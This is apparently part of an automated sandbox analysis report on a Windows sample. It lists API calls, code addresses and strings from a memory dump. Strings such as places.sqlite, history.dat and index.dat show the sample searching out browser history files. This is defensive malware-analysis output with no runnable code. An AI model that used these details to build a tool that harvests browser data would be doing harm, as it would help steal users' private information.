                                                  • GetDiskFreeSpaceA.KERNEL32(00000000,?,00000200,?,?,?,00000000,?,00000000), ref: 004187FA
                                                  • ??3@YAXPAX@Z.MSVCRT ref: 00418803
                                                  Memory Dump Source
                                                  • Source File: 0000000C.00000002.216342952571.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_12_2_400000_wab.jbxd
                                                  Similarity
                                                  • API ID: ??3@DiskFreeSpace$FullNamePathVersionmalloc
                                                  • String ID:
                                                  • API String ID: 2947809556-0
                                                  APIs
                                                    • Part of subcall function 00403BED: memset.MSVCRT ref: 00403C09
                                                    • Part of subcall function 00403BED: memset.MSVCRT ref: 00403C1E
                                                    • Part of subcall function 00403BED: wcscat.MSVCRT ref: 00403C47
                                                    • Part of subcall function 00403BED: wcscat.MSVCRT ref: 00403C70
                                                  • memset.MSVCRT ref: 00403A55
                                                    • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D29
                                                    • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D33
                                                    • Part of subcall function 00409D1F: wcscpy.MSVCRT ref: 00409D47
                                                    • Part of subcall function 00409D1F: wcscat.MSVCRT ref: 00409D55
                                                    • Part of subcall function 00409B98: GetFileAttributesW.KERNELBASE(?,00445E12,?,?,?,00000104), ref: 00409B9C
                                                    • Part of subcall function 0040A8D0: wcslen.MSVCRT ref: 0040A8E2
                                                    • Part of subcall function 0040A8D0: ??3@YAXPAX@Z.MSVCRT ref: 0040A908
                                                    • Part of subcall function 0040A8D0: ??3@YAXPAX@Z.MSVCRT ref: 0040A92B
                                                    • Part of subcall function 0040A8D0: memcpy.MSVCRT ref: 0040A94F
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 0000000C.00000002.216342952571.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_12_2_400000_wab.jbxd
                                                  Similarity
                                                  • API ID: memsetwcscatwcslen$??3@$AttributesFilememcpywcscpy
                                                  • String ID: history.dat$places.sqlite
                                                  • API String ID: 3093078384-467022611
                                                  APIs
                                                    • Part of subcall function 00417570: SetFilePointer.KERNELBASE(?,?,?,00000000), ref: 00417591
                                                    • Part of subcall function 00417570: GetLastError.KERNEL32 ref: 004175A2
                                                    • Part of subcall function 00417570: GetLastError.KERNEL32 ref: 004175A8
                                                  • ReadFile.KERNELBASE(?,?,?,?,00000000), ref: 0041761D
                                                  • GetLastError.KERNEL32 ref: 00417627
                                                  Memory Dump Source
                                                  • Source File: 0000000C.00000002.216342952571.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_12_2_400000_wab.jbxd
                                                  Similarity
                                                  • API ID: ErrorLast$File$PointerRead
                                                  • String ID:
                                                  • API String ID: 839530781-0
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 0000000C.00000002.216342952571.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_12_2_400000_wab.jbxd
                                                  Similarity
                                                  • API ID: FileFindFirst
                                                  • String ID: *.*$index.dat
                                                  • API String ID: 1974802433-2863569691
                                                  APIs
                                                  Memory Dump Source
                                                  • Source File: 0000000C.00000002.216342952571.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_12_2_400000_wab.jbxd
                                                  Similarity
                                                  • API ID: ??3@mallocmemcpy
                                                  • String ID:
                                                  • API String ID: 3831604043-0
                                                  APIs
                                                  • SetFilePointer.KERNELBASE(?,?,?,00000000), ref: 00417591
                                                  • GetLastError.KERNEL32 ref: 004175A2
                                                  • GetLastError.KERNEL32 ref: 004175A8
                                                  Memory Dump Source
                                                  • Source File: 0000000C.00000002.216342952571.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_12_2_400000_wab.jbxd
                                                  Similarity
                                                  • API ID: ErrorLast$FilePointer
                                                  • String ID:
                                                  • API String ID: 1156039329-0
                                                  APIs
                                                  • CreateFileW.KERNELBASE(00000000,80000000,00000003,00000000,00000003,02000000,00000000,00000000,00000000,004039CA,00000000,?,00000000,?,00000000), ref: 0040A044
                                                  • GetFileTime.KERNEL32(00000000,00000000,00000000,?), ref: 0040A058
                                                  • FindCloseChangeNotification.KERNELBASE(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,004455D5), ref: 0040A061
                                                  Memory Dump Source
                                                  • Source File: 0000000C.00000002.216342952571.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_12_2_400000_wab.jbxd
                                                  Similarity
                                                  • API ID: File$ChangeCloseCreateFindNotificationTime
                                                  • String ID:
                                                  • API String ID: 1631957507-0
                                                  APIs
                                                  • GetTempPathW.KERNEL32(00000104,?,00445FAE), ref: 00409A5C
                                                  • GetWindowsDirectoryW.KERNEL32(?,00000104), ref: 00409A6E
                                                  • GetTempFileNameW.KERNELBASE(?,0040B827,00000000,?), ref: 00409A85
                                                  Memory Dump Source
                                                  • Source File: 0000000C.00000002.216342952571.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_12_2_400000_wab.jbxd
                                                  Similarity
                                                  • API ID: Temp$DirectoryFileNamePathWindows
                                                  • String ID:
                                                  • API String ID: 1125800050-0
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 0000000C.00000002.216342952571.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_12_2_400000_wab.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID: d
                                                  • API String ID: 0-2564639436
                                                  APIs
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 0000000C.00000002.216342952571.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_12_2_400000_wab.jbxd
                                                  Similarity
                                                  • API ID: memset
                                                  • String ID: BINARY
                                                  • API String ID: 2221118986-907554435
                                                  APIs
                                                    • Part of subcall function 0040ECD8: ??2@YAPAXI@Z.MSVCRT ref: 0040ECF9
                                                    • Part of subcall function 0040ECD8: ??3@YAXPAX@Z.MSVCRT ref: 0040EDC0
                                                  • GetStdHandle.KERNEL32(000000F5), ref: 00410530
                                                  • FindCloseChangeNotification.KERNELBASE(?), ref: 00410654
                                                    • Part of subcall function 004096DC: CreateFileW.KERNELBASE(00000001,40000000,00000001,00000000,00000002,00000000,00000000,0040E0F1,00000104), ref: 004096EE
                                                    • Part of subcall function 0040973C: GetLastError.KERNEL32 ref: 00409750
                                                    • Part of subcall function 0040973C: _snwprintf.MSVCRT ref: 0040977D
                                                    • Part of subcall function 0040973C: MessageBoxW.USER32(?,?,Error,00000030), ref: 00409796
                                                  Memory Dump Source
                                                  • Source File: 0000000C.00000002.216342952571.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_12_2_400000_wab.jbxd
                                                  Similarity
                                                  • API ID: ??2@??3@ChangeCloseCreateErrorFileFindHandleLastMessageNotification_snwprintf
                                                  • String ID:
                                                  • API String ID: 1161345128-0
                                                  APIs
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 0000000C.00000002.216342952571.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_12_2_400000_wab.jbxd
                                                  Similarity
                                                  • API ID: _wcsicmp
                                                  • String ID: /stext
                                                  • API String ID: 2081463915-3817206916
                                                  APIs
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 0000000C.00000002.216342952571.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_12_2_400000_wab.jbxd
                                                  Similarity
                                                  • API ID: _wcsicmp
                                                  • String ID: .'w
                                                  • API String ID: 2081463915-220740710
                                                  APIs
                                                    • Part of subcall function 004096C3: CreateFileW.KERNELBASE(00000000,80000000,00000003,00000000,00000003,00000000,00000000,0044509F,00000000,?,00000000,00000104,00445E7E,?,?), ref: 004096D5
                                                  • GetFileSize.KERNEL32(00000000,00000000,000003FF,?,00000000,0040B7D4,?,?,?,?,000003FF,?,?,?,00445FAE,?), ref: 0040CC44
                                                    • Part of subcall function 0040AFCF: ??2@YAPAXI@Z.MSVCRT ref: 0040AFD8
                                                    • Part of subcall function 0040A2EF: ReadFile.KERNELBASE(00000000,00000000,004450DD,00000000,00000000,?,?,004450DD,00000000,00000000), ref: 0040A306
                                                    • Part of subcall function 0040AB4A: MultiByteToWideChar.KERNEL32(00000000,00000000,?,?,00000000,00000000,?,00000001,?,00401D51,00000000,00000001,00000000), ref: 0040AB63
                                                    • Part of subcall function 0040AB4A: MultiByteToWideChar.KERNEL32(00000000,00000000,?,?,00000000,00000000,?,00000001,?,00401D51,00000000,00000001,00000000), ref: 0040AB88
                                                  • FindCloseChangeNotification.KERNELBASE(?,?,000000FF,0000FDE9), ref: 0040CC98
                                                    • Part of subcall function 0040B04B: ??3@YAXPAX@Z.MSVCRT ref: 0040B052
                                                  Memory Dump Source
                                                  • Source File: 0000000C.00000002.216342952571.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_12_2_400000_wab.jbxd
                                                  Similarity
                                                  • API ID: File$ByteCharMultiWide$??2@??3@ChangeCloseCreateFindNotificationReadSize
                                                  • String ID:
                                                  • API String ID: 159017214-0
                                                  APIs
                                                    • Part of subcall function 0040A804: memset.MSVCRT ref: 0040A824
                                                    • Part of subcall function 0040A804: GetSystemDirectoryW.KERNEL32(0045DE68,00000104), ref: 0040A841
                                                    • Part of subcall function 0040A804: wcscpy.MSVCRT ref: 0040A854
                                                    • Part of subcall function 0040A804: wcscat.MSVCRT ref: 0040A86A
                                                    • Part of subcall function 0040A804: LoadLibraryW.KERNELBASE(00000000,?,?,?,?,?,?,?), ref: 0040A87B
                                                    • Part of subcall function 0040A804: LoadLibraryW.KERNEL32(?,?,?,?,?,?,?,?), ref: 0040A884
                                                  • GetProcAddress.KERNEL32(?,00000000), ref: 00404453
                                                  • FreeLibrary.KERNEL32(00000000,00000141,?,00000000,?,004026E9,?,?,00000000,?), ref: 00404476
                                                  Memory Dump Source
                                                  • Source File: 0000000C.00000002.216342952571.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_12_2_400000_wab.jbxd
                                                  Similarity
                                                  • API ID: Library$Load$AddressDirectoryFreeProcSystemmemsetwcscatwcscpy
                                                  • String ID:
                                                  • API String ID: 3150196962-0
                                                  APIs
                                                  Strings
                                                  • failed to allocate %u bytes of memory, xrefs: 004152F0
                                                  Memory Dump Source
                                                  • Source File: 0000000C.00000002.216342952571.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_12_2_400000_wab.jbxd
                                                  Similarity
                                                  • API ID: malloc
                                                  • String ID: failed to allocate %u bytes of memory
                                                  • API String ID: 2803490479-1168259600
                                                  APIs
                                                  Memory Dump Source
                                                  • Source File: 0000000C.00000002.216342952571.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_12_2_400000_wab.jbxd
                                                  Similarity
                                                  • API ID: ??3@
                                                  • String ID:
                                                  • API String ID: 613200358-0
                                                  APIs
                                                  Memory Dump Source
                                                  • Source File: 0000000C.00000002.216342952571.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_12_2_400000_wab.jbxd
                                                  Similarity
                                                  • API ID: memcmpmemset
                                                  • String ID:
                                                  • API String ID: 1065087418-0
                                                  APIs
                                                  Memory Dump Source
                                                  • Source File: 0000000C.00000002.216342952571.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_12_2_400000_wab.jbxd
                                                  Similarity
                                                  • API ID: memcpymemset
                                                  • String ID:
                                                  • API String ID: 1297977491-0
                                                  APIs
                                                    • Part of subcall function 00403A16: memset.MSVCRT ref: 00403A55
                                                    • Part of subcall function 0040A02C: CreateFileW.KERNELBASE(00000000,80000000,00000003,00000000,00000003,02000000,00000000,00000000,00000000,004039CA,00000000,?,00000000,?,00000000), ref: 0040A044
                                                    • Part of subcall function 0040A02C: GetFileTime.KERNEL32(00000000,00000000,00000000,?), ref: 0040A058
                                                    • Part of subcall function 0040A02C: FindCloseChangeNotification.KERNELBASE(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,004455D5), ref: 0040A061
                                                  • CompareFileTime.KERNEL32(?,?,00000000,?,00000000), ref: 004039D4
                                                  Memory Dump Source
                                                  • Source File: 0000000C.00000002.216342952571.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_12_2_400000_wab.jbxd
                                                  Similarity
                                                  • API ID: File$Time$ChangeCloseCompareCreateFindNotificationmemset
                                                  • String ID:
                                                  • API String ID: 1481295809-0
                                                  APIs
                                                    • Part of subcall function 004135E0: FreeLibrary.KERNELBASE(?,00413603,00000000,0044557A,?,?,?,?,?,00403335,?), ref: 004135EC
                                                    • Part of subcall function 0040A804: memset.MSVCRT ref: 0040A824
                                                    • Part of subcall function 0040A804: GetSystemDirectoryW.KERNEL32(0045DE68,00000104), ref: 0040A841
                                                    • Part of subcall function 0040A804: wcscpy.MSVCRT ref: 0040A854
                                                    • Part of subcall function 0040A804: wcscat.MSVCRT ref: 0040A86A
                                                    • Part of subcall function 0040A804: LoadLibraryW.KERNELBASE(00000000,?,?,?,?,?,?,?), ref: 0040A87B
                                                    • Part of subcall function 0040A804: LoadLibraryW.KERNEL32(?,?,?,?,?,?,?,?), ref: 0040A884
                                                  • GetProcAddress.KERNEL32(?,00000000), ref: 0041362A
                                                  Memory Dump Source
                                                  • Source File: 0000000C.00000002.216342952571.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_12_2_400000_wab.jbxd
                                                  Similarity
                                                  • API ID: Library$Load$AddressDirectoryFreeProcSystemmemsetwcscatwcscpy
                                                  • String ID:
                                                  • API String ID: 3150196962-0
                                                  APIs
                                                  • SetFilePointerEx.KERNELBASE(0040627C,?,?,00000000,00000000,00000000,004068F9,00000000,00000000,?,00000000,0040627C), ref: 004062C2
                                                    • Part of subcall function 0040A2EF: ReadFile.KERNELBASE(00000000,00000000,004450DD,00000000,00000000,?,?,004450DD,00000000,00000000), ref: 0040A306
                                                  Memory Dump Source
                                                  • Source File: 0000000C.00000002.216342952571.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_12_2_400000_wab.jbxd
                                                  Similarity
                                                  • API ID: File$PointerRead
                                                  • String ID:
                                                  • API String ID: 3154509469-0
                                                  APIs
                                                  • GetPrivateProfileIntW.KERNEL32(?,?,?,?), ref: 00414588
                                                    • Part of subcall function 004143F1: memset.MSVCRT ref: 00414410
                                                    • Part of subcall function 004143F1: _itow.MSVCRT ref: 00414427
                                                    • Part of subcall function 004143F1: WritePrivateProfileStringW.KERNEL32(?,?,00000000), ref: 00414436
                                                  Memory Dump Source
                                                  • Source File: 0000000C.00000002.216342952571.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_12_2_400000_wab.jbxd
                                                  Similarity
                                                  • API ID: PrivateProfile$StringWrite_itowmemset
                                                  • String ID:
                                                  • API String ID: 4232544981-0
                                                  APIs
                                                  • FreeLibrary.KERNELBASE(?,?,004452FB,?,?,?,0040333C,?), ref: 00444A65
                                                  Memory Dump Source
                                                  • Source File: 0000000C.00000002.216342952571.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_12_2_400000_wab.jbxd
                                                  Similarity
                                                  • API ID: FreeLibrary
                                                  • String ID:
                                                  • API String ID: 3664257935-0
                                                  APIs
                                                    • Part of subcall function 00413F4F: GetProcAddress.KERNEL32(00000000,psapi.dll), ref: 00413F6F
                                                    • Part of subcall function 00413F4F: GetProcAddress.KERNEL32(?,EnumProcessModules), ref: 00413F7B
                                                    • Part of subcall function 00413F4F: GetProcAddress.KERNEL32(?,GetModuleFileNameExW), ref: 00413F87
                                                    • Part of subcall function 00413F4F: GetProcAddress.KERNEL32(?,EnumProcesses), ref: 00413F93
                                                    • Part of subcall function 00413F4F: GetProcAddress.KERNEL32(?,GetModuleInformation), ref: 00413F9F
                                                  • K32GetModuleFileNameExW.KERNEL32(00000104,00000000,00413E1F,00000104,00413E1F,00000000,?), ref: 00413F46
                                                  Memory Dump Source
                                                  • Source File: 0000000C.00000002.216342952571.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_12_2_400000_wab.jbxd
                                                  Similarity
                                                  • API ID: AddressProc$FileModuleName
                                                  • String ID:
                                                  • API String ID: 3859505661-0
                                                  APIs
                                                  • ReadFile.KERNELBASE(00000000,00000000,004450DD,00000000,00000000,?,?,004450DD,00000000,00000000), ref: 0040A306
                                                  Memory Dump Source
                                                  • Source File: 0000000C.00000002.216342952571.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_12_2_400000_wab.jbxd
                                                  Similarity
                                                  • API ID: FileRead
                                                  • String ID:
                                                  • API String ID: 2738559852-0
                                                  APIs
                                                  • WriteFile.KERNELBASE(?,00000009,?,00000000,00000000,?,?,00402F9B,?,00000000,00000000,00000000,0000017E), ref: 0040A325
                                                  Memory Dump Source
                                                  • Source File: 0000000C.00000002.216342952571.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_12_2_400000_wab.jbxd
                                                  Similarity
                                                  • API ID: FileWrite
                                                  • String ID:
                                                  • API String ID: 3934441357-0
                                                  APIs
                                                  • FreeLibrary.KERNELBASE(00000000,004457F2,00000000,000001F7,00000000), ref: 00413D30
                                                  Memory Dump Source
                                                  • Source File: 0000000C.00000002.216342952571.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_12_2_400000_wab.jbxd
                                                  Similarity
                                                  • API ID: FreeLibrary
                                                  • String ID:
                                                  • API String ID: 3664257935-0
                                                  APIs
                                                  Memory Dump Source
                                                  • Source File: 0000000C.00000002.216342952571.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_12_2_400000_wab.jbxd
                                                  Similarity
                                                  • API ID: ??3@
                                                  • String ID:
                                                  • API String ID: 613200358-0
                                                  APIs
                                                  • CreateFileW.KERNELBASE(00000000,80000000,00000003,00000000,00000003,00000000,00000000,0044509F,00000000,?,00000000,00000104,00445E7E,?,?), ref: 004096D5
                                                  Memory Dump Source
                                                  • Source File: 0000000C.00000002.216342952571.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_12_2_400000_wab.jbxd
                                                  Similarity
                                                  • API ID: CreateFile
                                                  • String ID:
                                                  • API String ID: 823142352-0
                                                  APIs
                                                  • CreateFileW.KERNELBASE(00000001,40000000,00000001,00000000,00000002,00000000,00000000,0040E0F1,00000104), ref: 004096EE
                                                  Memory Dump Source
                                                  • Source File: 0000000C.00000002.216342952571.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_12_2_400000_wab.jbxd
                                                  Similarity
                                                  • API ID: CreateFile
                                                  • String ID:
                                                  • API String ID: 823142352-0
                                                  APIs
                                                  Memory Dump Source
                                                  • Source File: 0000000C.00000002.216342952571.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_12_2_400000_wab.jbxd
                                                  Similarity
                                                  • API ID: ??3@
                                                  • String ID:
                                                  • API String ID: 613200358-0
                                                  APIs
                                                  Memory Dump Source
                                                  • Source File: 0000000C.00000002.216342952571.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_12_2_400000_wab.jbxd
                                                  Similarity
                                                  • API ID: ??3@
                                                  • String ID:
                                                  • API String ID: 613200358-0
                                                  APIs
                                                  • FreeLibrary.KERNELBASE(?,00413603,00000000,0044557A,?,?,?,?,?,00403335,?), ref: 004135EC
                                                  Memory Dump Source
                                                  • Source File: 0000000C.00000002.216342952571.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_12_2_400000_wab.jbxd
                                                  Similarity
                                                  • API ID: FreeLibrary
                                                  • String ID:
                                                  • API String ID: 3664257935-0
                                                  APIs
                                                  • EnumResourceNamesW.KERNELBASE(?,?,Function_000148B6,00000000), ref: 0041494B
                                                  Memory Dump Source
                                                  • Source File: 0000000C.00000002.216342952571.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_12_2_400000_wab.jbxd
                                                  Similarity
                                                  • API ID: EnumNamesResource
                                                  • String ID:
                                                  • API String ID: 3334572018-0
                                                  APIs
                                                  • FreeLibrary.KERNELBASE(?), ref: 0044DEB6
                                                  Memory Dump Source
                                                  • Source File: 0000000C.00000002.216342952571.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_12_2_400000_wab.jbxd
                                                  Similarity
                                                  • API ID: FreeLibrary
                                                  • String ID:
                                                  • API String ID: 3664257935-0
                                                  APIs
                                                  • FindClose.KERNELBASE(?,0040AE21,?,00000000,00445EF5,*.*,?,00000000,?,00000104,?,?,?,?,?,00000104), ref: 0040AEC8
                                                  Memory Dump Source
                                                  • Source File: 0000000C.00000002.216342952571.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_12_2_400000_wab.jbxd
                                                  Similarity
                                                  • API ID: CloseFind
                                                  • String ID:
                                                  • API String ID: 1863332320-0
                                                  APIs
                                                  • RegOpenKeyExW.KERNELBASE(80000002,80000002,00000000,00020019,80000002,00414CC1,80000002,Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders,00445DDE,?,?,00000000), ref: 004145A5
                                                  Memory Dump Source
                                                  • Source File: 0000000C.00000002.216342952571.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_12_2_400000_wab.jbxd
                                                  Similarity
                                                  • API ID: Open
                                                  • String ID:
                                                  • API String ID: 71445658-0
                                                  APIs
                                                  • GetFileAttributesW.KERNELBASE(?,00445E12,?,?,?,00000104), ref: 00409B9C
                                                  Memory Dump Source
                                                  • Source File: 0000000C.00000002.216342952571.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_12_2_400000_wab.jbxd
                                                  Similarity
                                                  • API ID: AttributesFile
                                                  • String ID:
                                                  • API String ID: 3188754299-0
                                                  APIs
                                                  Memory Dump Source
                                                  • Source File: 0000000C.00000002.216342952571.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_12_2_400000_wab.jbxd
                                                  Similarity
                                                  • API ID: ??3@
                                                  • String ID:
                                                  • API String ID: 613200358-0
                                                  Memory Dump Source
                                                  • Source File: 0000000C.00000002.216342952571.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_12_2_400000_wab.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  APIs
                                                  • memset.MSVCRT ref: 004095FC
                                                    • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D29
                                                    • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D33
                                                    • Part of subcall function 00409D1F: wcscpy.MSVCRT ref: 00409D47
                                                    • Part of subcall function 00409D1F: wcscat.MSVCRT ref: 00409D55
                                                    • Part of subcall function 00409B98: GetFileAttributesW.KERNELBASE(?,00445E12,?,?,?,00000104), ref: 00409B9C
                                                    • Part of subcall function 004091B8: memset.MSVCRT ref: 004091E2
                                                    • Part of subcall function 004091B8: memcpy.MSVCRT ref: 004092C9
                                                    • Part of subcall function 004091B8: memcmp.MSVCRT ref: 004092D9
                                                  Memory Dump Source
                                                  • Source File: 0000000C.00000002.216342952571.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_12_2_400000_wab.jbxd
                                                  Similarity
                                                  • API ID: memsetwcslen$AttributesFilememcmpmemcpywcscatwcscpy
                                                  • String ID:
                                                  • API String ID: 3655998216-0
                                                  APIs
                                                  • memset.MSVCRT ref: 00445426
                                                    • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D29
                                                    • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D33
                                                    • Part of subcall function 00409D1F: wcscpy.MSVCRT ref: 00409D47
                                                    • Part of subcall function 00409D1F: wcscat.MSVCRT ref: 00409D55
                                                    • Part of subcall function 00409B98: GetFileAttributesW.KERNELBASE(?,00445E12,?,?,?,00000104), ref: 00409B9C
                                                    • Part of subcall function 0040B6EF: memset.MSVCRT ref: 0040B71C
                                                    • Part of subcall function 0040B6EF: wcsrchr.MSVCRT ref: 0040B738
                                                    • Part of subcall function 0040B6EF: memset.MSVCRT ref: 0040B756
                                                    • Part of subcall function 0040B6EF: memset.MSVCRT ref: 0040B7F5
                                                    • Part of subcall function 0040B6EF: CreateFileW.KERNELBASE(00445FAE,80000000,00000000,00000000,00000003,00000000,00000000,?,?), ref: 0040B80C
                                                  Memory Dump Source
                                                  • Source File: 0000000C.00000002.216342952571.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_12_2_400000_wab.jbxd
                                                  Similarity
                                                  • API ID: memset$Filewcslen$AttributesCreatewcscatwcscpywcsrchr
                                                  • String ID:
                                                  • API String ID: 1828521557-0
                                                  APIs
                                                    • Part of subcall function 00406294: CloseHandle.KERNEL32(000000FF,00406224,00000000,00000000,0040E03C,?,00000000,00000104,00000000,?,?,?,0040E521,?,0040E6A3,000000FF), ref: 0040629C
                                                    • Part of subcall function 004096C3: CreateFileW.KERNELBASE(00000000,80000000,00000003,00000000,00000003,00000000,00000000,0044509F,00000000,?,00000000,00000104,00445E7E,?,?), ref: 004096D5
                                                  • GetLastError.KERNEL32(00000000,00000000,0040E03C,?,00000000,00000104,00000000,?,?,?,0040E521,?,0040E6A3,000000FF,?,00000104), ref: 00406281
                                                    • Part of subcall function 0040A2EF: ReadFile.KERNELBASE(00000000,00000000,004450DD,00000000,00000000,?,?,004450DD,00000000,00000000), ref: 0040A306
                                                  Memory Dump Source
                                                  • Source File: 0000000C.00000002.216342952571.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_12_2_400000_wab.jbxd
                                                  Similarity
                                                  • API ID: File$CloseCreateErrorHandleLastRead
                                                  • String ID:
                                                  • API String ID: 2136311172-0
                                                  APIs
